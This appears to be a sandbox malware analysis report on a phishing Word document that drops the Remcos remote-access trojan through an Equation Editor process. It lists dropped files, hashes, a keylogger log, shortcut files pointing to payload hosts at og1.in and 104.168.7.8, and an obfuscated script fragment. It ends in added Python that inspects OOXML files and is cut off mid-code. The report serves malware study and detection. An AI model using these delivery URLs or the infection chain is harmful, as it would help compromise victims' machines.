                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33900902, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21037056
                                                                                                                                Entropy (8bit):1.1388598365604055
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:w61U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:w6EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                MD5:3AA8B4AA08B8C5FA0E70A5557BCDF29A
                                                                                                                                SHA1:0E12529B2C71FBE5AEA75CBEAAFA4278EB871EBD
                                                                                                                                SHA-256:265A917C59A79C9FE04C0220E35232E3E3A5C21FE71954C27EA06B005FFCC2B4
                                                                                                                                SHA-512:AC2676D59CB4F9F5FD1523FC9F511B9225B66E7148FBC1CB002856BA229E9B00E3E72D22E580384B2484FC210EFC1C8C28D7F10A7E16068E2B7E347C4505B10D
                                                                                                                                Malicious:false
                                                                                                                                Preview:3...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2
                                                                                                                                Entropy (8bit):1.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                Malicious:false
                                                                                                                                Preview:..
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2
                                                                                                                                Entropy (8bit):1.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                Malicious:false
                                                                                                                                Preview:..
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370
                                                                                                                                Entropy (8bit):3.4900177446237195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:6lJLdCl55YcIeeDAl3PTpRsDRhOlGjSNombQOfxNa/WAv:6lJLCecZ/sDRhOlqyp50/W+
                                                                                                                                MD5:49E796EEA53B35DF89C84E7D65D2ECEC
                                                                                                                                SHA1:0EA83CDFAA996B1B5A64C80CCE528D810A82A11E
                                                                                                                                SHA-256:C7C2876C531508536302E4CBC4155C0D0B7EB5050B36DB85EE7827B7A22AA837
                                                                                                                                SHA-512:30F9BADED8645F665F04BC6F876276CE5BD1126F878A5ACE3E0623AE693D38C8CFA3F49C91DAD33EDE17FAE388DCF2413755498B4E818BA89F4947F33EEE02BD
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, Author: Joe Security
                                                                                                                                Preview:....[.2.0.2.4./.1.0./.0.1. .0.3.:.2.5.:.3.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131072
                                                                                                                                Entropy (8bit):0.025585736770226363
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:I3DPcGt9SLHvxggLRt7rrarFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPFkPdrYvYg3J/
                                                                                                                                MD5:96B4A9294F62177682DC7D0240F723FA
                                                                                                                                SHA1:19CA0142B3D37A268759F6AE0A4B6FAD748B08A2
                                                                                                                                SHA-256:9EDE9C742D46B504FEB3888413A8B977A6229CD6FF9CEE1A3E263B380AC8407C
                                                                                                                                SHA-512:55272C88A37056AAC1043107FA3975B5B4549C6382C22BCF8574A1DD797D4D66D1C965E95F153657E71603EC7FA758AB3CC67A31C447105B59A48886B67FAFB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:......M.eFy...z...0Ay.O.X......S,...X.F...Fa.q.............................!.9.5.D...Y(...........z"....@..l...6.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131072
                                                                                                                                Entropy (8bit):0.025577196307894484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:I3DPcb5zxVvxggLRXy+gE3qMotRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQf7y+gYuvYg3J/
                                                                                                                                MD5:2B6A45709F67C046DDB5A17D7F36171C
                                                                                                                                SHA1:554EC1BE3FD1D3F2569433AFFF70C31E3281E40B
                                                                                                                                SHA-256:65D3CE86B193F2092D008CB2B7DC637B807719A4F36B9755A17AB6B9FF7332CB
                                                                                                                                SHA-512:835794624803B8F1CA3B4D6B2ACB8D0766B25FB5F0AAB932239C9204178D24B8303604E7DB64EF45873CDA0E3B9B812333279E9CEA5FCCD109664DDE8201F4B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:......M.eFy...z.b....F..=...xS,...X.F...Fa.q............................@|.....J......Jf........?,br.i.I.9_..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<https://og1.in/9aubsm>), ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):47
                                                                                                                                Entropy (8bit):4.681832468514788
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HRAbABGQYm2fjUeZQvn:HRYFVm4ofvn
                                                                                                                                MD5:3FA283841906814A11FA7ECA3C8A5D91
                                                                                                                                SHA1:4B441832B5E0636F64285031E20F37094EB8980B
                                                                                                                                SHA-256:8A502323B18AB1D652C3F59E42B68AE77AE8AEC41B9791064C4BF54A7363F73A
                                                                                                                                SHA-512:4B3E520E8C28C172854A9439AF126440B5BDA45566A9409C3D6DBDC02D30219FE7693D6979FBCD3D6A6498600FCA525A414C1C6E6667AEBD592B179F1C958D95
                                                                                                                                Malicious:true
                                                                                                                                Preview:[InternetShortcut]..URL=https://og1.in/9aubsm..
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://104.168.7.8/510/RN/>), ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):52
                                                                                                                                Entropy (8bit):4.649878362697039
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HRAbABGQYm/GfLUSn:HRYFVm/5S
                                                                                                                                MD5:6F1AE91F5228D4A832D44D0D2BEAC6B0
                                                                                                                                SHA1:B9B81104C98627EBCEAB97B2E5DCA2DB8EC9F452
                                                                                                                                SHA-256:A7AA5478100D2C900E09DE788A09D5086E25F6B8AE7913F404E5AABEBA03E4AE
                                                                                                                                SHA-512:8F613DE90E375844310C23E4B28C8D31CF10BB241C5B802EA2D1927837A0D89CF73D41A5CB25921EF1D3146DC117B561E2C49AA83FD52A1ACF5B29731FFF2790
                                                                                                                                Malicious:true
                                                                                                                                Preview:[InternetShortcut]..URL=http://104.168.7.8/510/RN/..
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Tue Oct 1 06:25:02 2024, length=788500, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1169
                                                                                                                                Entropy (8bit):4.577692199189722
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8Jz/XT8RxONrsWPreqYe0YsWRDv3q/57u:8J/XTs0YWPrZmpW4/9u
                                                                                                                                MD5:032062D6565093F80A5BCF1EA2CD02A3
                                                                                                                                SHA1:C7F0DABFF7EABA8006AFE284F2A6B717B2F481C0
                                                                                                                                SHA-256:E68E0A9D49A6794CD20C9EE01C2A50F635F85455643F6E37CED522270DD9229A
                                                                                                                                SHA-512:A2AC3468D981450C6A41BE703D8D53A65EA9F1AC3533E6214DC241DC0CBDCF3813E78FCB660BDD7C618341DB705995594A268B0B3AEE24D78DB2DB419319CE64
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.... ....UB.r....UB.r...&"...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....AY.;..user.8......QK.XAY.;*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....AY"; .SCANOR~1.DOC..........WC..WC.*.........................S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Scan Order and Specification 01-10- 2024.docx.D.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Generic INItialization configuration [misc]
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):154
                                                                                                                                Entropy (8bit):4.959902543844779
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:bDtSWnJYVmKxeUyeScVJywT4/vfBpXVomxW9TLCJywT4/vfBpXVov:bAeYVCU8qcHJ3OTLUcHJ3y
                                                                                                                                MD5:1B3CE7ED74C5116826E7178331FB014C
                                                                                                                                SHA1:4C8AD6049E4D20953EE13C5D7254D2F074BB9031
                                                                                                                                SHA-256:DADCF6480790DEA0F570977C548A8454B468F13BF33E212A11CE63D452F9E13C
                                                                                                                                SHA-512:D04E1598AC1A7E5856C1EB5620D0A812E66085C10FB74EAE483AB071A8CB0A423DB8EF826EF71D1DBC227FC8B7D9AD11E1ACEDE272FF60D92F6119EF8FC0C58F
                                                                                                                                Malicious:false
                                                                                                                                Preview:[folders]..9aubsm.url=0..RN on 104.168.7.8.url=0..Scan Order and Specification 01-10- 2024.LNK=0..[misc]..Scan Order and Specification 01-10- 2024.LNK=0..
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):162
                                                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256672
                                                                                                                                Entropy (8bit):3.748947235455245
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:Nq4GRwdiKr3UfoJzrtFPZcMRQml/qJ1sZh7ryvESig:Nq4GCiKQfoJvPOnmlCJ1oh7+vDh
                                                                                                                                MD5:09386235B48255A0B5B5EE106428A9DD
                                                                                                                                SHA1:AAED31297121E1FCE8222D417EF8BC90471AF3DE
                                                                                                                                SHA-256:5E78D2BAED8277AFF8D71F752F4CA00621B6B487A022A942383883A6791364D2
                                                                                                                                SHA-512:760E43B96EA2D455B414ED9FBCEB6B4BA3CF264E9B86015327DB20E3F1ECFEB5210738C9543C26B0CA270FE92170932ADD452E9935CCD218A65FE76918BB3051
                                                                                                                                Malicious:true
                                                                                                                                Preview:..U.U.L.G.m.c.R.j.Q.N.W.K.p.W.m.k.P.L.W.P.i.n.L.W.h.o. .=. .".k.A.f.z.N.C.K.j.K.G.n.L.B.P.f.e.s.k.S.W.L.K.n.G.c.e.".....A.K.L.a.n.i.e.b.i.U.L.K.b.n.G.B.i.L.K.r.u.m.L.B.W.G. .=. .".S.R.t.G.P.f.i.k.u.l.W.K.W.u.I.v.R.m.N.H.h.C.C.p.k.L.".....H.G.L.P.U.i.z.c.L.P.C.W.q.W.L.x.k.P.e.n.m.R.j.L.k.e. .=. .".W.P.m.c.L.o.T.K.d.U.N.b.L.K.k.L.K.v.W.K.R.N.W.l.T.p.".....i.h.d.j.U.C.o.K.K.A.e.W.v.f.f.G.I.o.q.K.L.G.A.G.A.d. .=. .".Z.e.h.N.e.x.L.g.i.k.C.W.m.W.C.B.l.e.R.z.l.e.x.c.h.B.".....i.W.C.c.P.W.Z.x.H.W.U.e.b.T.p.h.W.e.d.p.e.K.c.k.i.K. .=. .".f.P.d.P.h.W.c.c.h.e.l.R.W.h.K.G.N.U.W.W.e.k.A.r.U.K.".....c.d.K.o.O.p.k.J.o.G.W.K.N.x.Z.L.m.t.W.H.Q.t.W.e.e.m. .=. .".L.L.c.p.A.Z.G.m.l.G.W.Z.a.m.c.t.e.g.L.b.e.G.K.o.r.m.".....Z.L.z.p.L.W.h.G.f.d.b.m.L.G.W.P.G.q.t.d.R.u.W.L.U.a. .=. .".i.N.c.c.z.L.W.G.e.o.e.h.l.z.B.m.P.W.t.L.K.L.W.z.p.L.".....p.e.n.z.U.U.L.N.W.P.h.j.e.H.e.J.e.G.i.o.U.b.e.f.q.K. .=. .".e.f.W.h.z.S.O.t.O.W.u.L.W.m.H.P.R.n.A.Z.h.e.W.U.P.a.".....O.p.h.K.p.i.Z.o.l.A.U.L.f.q.i.O.z.U.c.b.i.L.K.W.k.c. .
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):162
                                                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                File type:Microsoft Word 2007+
                                                                                                                                Entropy (8bit):7.994740954983637
                                                                                                                                TrID:
                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                File name:Scan Order and Specification 01-10- 2024.docx
                                                                                                                                File size:788'500 bytes
                                                                                                                                MD5:fe8c8dbd1f4b4fa2023fe185c8ed9df0
                                                                                                                                SHA1:5988ab649d7bb7f0d3886027f22effb94f9869cd
                                                                                                                                SHA256:1acb6c95b780cceb7eab5a679c73e2c22b8e6550454164d2febb6b8b3a5094b5
                                                                                                                                SHA512:57a700141c5897a54959ff2a4da7fc867c295a48ba646d06bdcf548cd84f7fd88034da658373628a99c6f6447fa582e7f3b2d63046dd0a3ebff6f7547d030522
                                                                                                                                SSDEEP:12288:zNCgJClLmC6lGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8XdyAxd6mzoGftSr1Q:z7ClGL0CjY7EDWQisQB2tXuadyZGwr1Q
                                                                                                                                TLSH:FBF423A8E49ADDB78E66B0B3C251A47CF6B4EEFC0A45889375FD0344954F9A0F0D418E
                                                                                                                                File Content Preview:PK..........AY+..0............[Content_Types].xmlUT......f...f...f.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..
                                                                                                                                Icon Hash:65e6a3a3afb7bdbf
                                                                                                                                Document Type:OpenXML
                                                                                                                                Number of OLE Files:2
                                                                                                                                Has Summary Info:
                                                                                                                                Application Name:
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:True
                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                Flash Objects Count:0
                                                                                                                                Contains VBA Macros:False
                                                                                                                                Code Page:1252
                                                                                                                                Title:
                                                                                                                                Subject:
                                                                                                                                Author:91974
                                                                                                                                Keywords:
                                                                                                                                Template:Normal.dotm
                                                                                                                                Last Saved By:91974
Revision Number:4
                                                                                                                                Total Edit Time:1
                                                                                                                                Last Printed:2024-07-15 15:30:47
                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                Number of Pages:1
                                                                                                                                Number of Words:0
                                                                                                                                Number of Characters:0
Thumbnail:(WMF/EMF thumbnail image; binary metafile data omitted. Readable strings in the image: "N ordre", "DATE", "SOLDE AU 02/01/2024", "WORMS ALGERIE SHIPPING SPA (WALSHIP)", "Caisse Annaba - 2024", "LIBELLES / DESIGNATIONS"; fonts referenced: Arial, Cambria, Calibri, System)
                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                Security:0
                                                                                                                                Document Code Page:1252
                                                                                                                                Number of Lines:1
                                                                                                                                Number of Paragraphs:1
                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:Grizli777
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:12.0000
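The static info above gives Document Type OpenXML and Number of OLE Files 2, but it does not say where those objects sit inside the package or whether any relationship in it points outside the file. As an added example, not part of the Joe Sandbox report, the Python below walks the .zip container to answer both questions; the document it builds is a constructed stand-in (a few bytes of OLE header plus two relationship files), not the analysed sample, and the relationship Type URIs are the standard OOXML ones.

```python
"""Enumerate embedded OLE objects and external-target relationships in an OOXML document.

Added example, not part of the Joe Sandbox report. The .docx built by
build_sample_docx() is a constructed stand-in, not the analysed sample.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File Binary signature
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def inspect_docx(data: bytes) -> dict:
    """Return the parts that are OLE compound files and every relationship
    whose TargetMode is External (the OOXML way of pointing at remote content)."""
    ole_parts, external = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            body = z.read(name)
            if name.endswith(".rels"):
                for rel in ET.fromstring(body).iter(RELS_NS + "Relationship"):
                    if rel.get("TargetMode") == "External":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        external.append((name, rtype, rel.get("Target")))
            elif body[:8] == OLE_MAGIC:
                ole_parts.append(name)
    return {"ole_parts": ole_parts, "external_links": external}


def build_sample_docx() -> bytes:
    """Constructed package: one embedded OLE object and one remote attachedTemplate link."""
    doc_rels = (
        f'<Relationships xmlns="{RELS_NS[1:-1]}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}oleObject" Target="embeddings/oleObject1.bin"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
        '</Relationships>'
    )
    settings_rels = (
        f'<Relationships xmlns="{RELS_NS[1:-1]}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
        'Target="http://template.example.invalid/t.dotm" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", doc_rels)
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
        # Only the CFB signature plus padding: enough to be recognised as an OLE part.
        z.writestr("word/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    report = inspect_docx(build_sample_docx())
    print("OLE parts:", report["ole_parts"])
    for part, rtype, target in report["external_links"]:
        print(f"external {rtype} in {part} -> {target}")
```

On a real file call `inspect_docx(open(path, "rb").read())`. An `attachedTemplate` relationship (remote template) or an `oleObject` relationship (linked object) with TargetMode External is worth reading before detonation, because the sandbox only sees what the remote host chose to serve at analysis time.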
                                                                                                                                General
                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:114
                                                                                                                                Entropy:4.25248375192737
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
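The \x1CompObj stream just listed is the one that says what the embedded object actually is. As an added example, not part of the Joe Sandbox report, the Python below parses that stream's fields (layout per MS-OLEDS 2.3.8); its only input is the 114 bytes copied from the Data Raw line above, and the small CLSID table is general knowledge rather than something the report states.

```python
"""Parse the \\x01CompObj stream of an embedded OLE object (layout per MS-OLEDS 2.3.8).

Added example for this report, not Joe Sandbox code. COMPOBJ_HEX is the
114-byte stream exactly as the report's "Data Raw" field prints it.
"""
import struct
import uuid

# Copied from the report's "Data Raw" line for Stream Path \x01CompObj.
COMPOBJ_HEX = (
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 "
    "00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 "
    "20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 "
    "00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e "
    "38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)

# Well-known OLE class IDs an analyst checks first (general knowledge, not from
# the report). Lower-case so they compare equal to str(uuid.UUID(...)).
KNOWN_CLSIDS = {
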